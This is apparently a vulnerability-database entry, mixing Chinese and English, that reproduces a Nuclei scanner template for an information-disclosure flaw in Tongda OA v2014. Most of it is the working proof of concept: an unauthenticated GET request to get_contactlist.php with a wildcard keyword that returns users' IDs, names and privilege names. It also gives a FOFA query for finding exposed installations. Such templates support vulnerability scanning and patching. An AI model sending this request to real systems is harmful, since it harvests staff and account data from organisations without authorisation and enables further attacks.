tongda-contact-list-exposure: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure

日期: 2025-08-01 | 影响软件: Tongda OA v2014 | POC: 已公开

漏洞描述

There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.

PoC代码[已公开]

id: tongda-contact-list-exposure

info:
  name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
  author: SleepingBag945
  severity: medium
  description: |
    There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="TDXK-通达OA"
  tags: tongda,oa,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'user_uid":'
          - 'user_name":'
          - 'priv_name":'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205ee5b04767e0aee93fcd332cb022095f8abc0c2f8c540bbf8194a19d3b18a96b02207b5e5e6ad36481367b24b21cbddc966837a80026c537f6c4dcbfd11e335be1b4:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml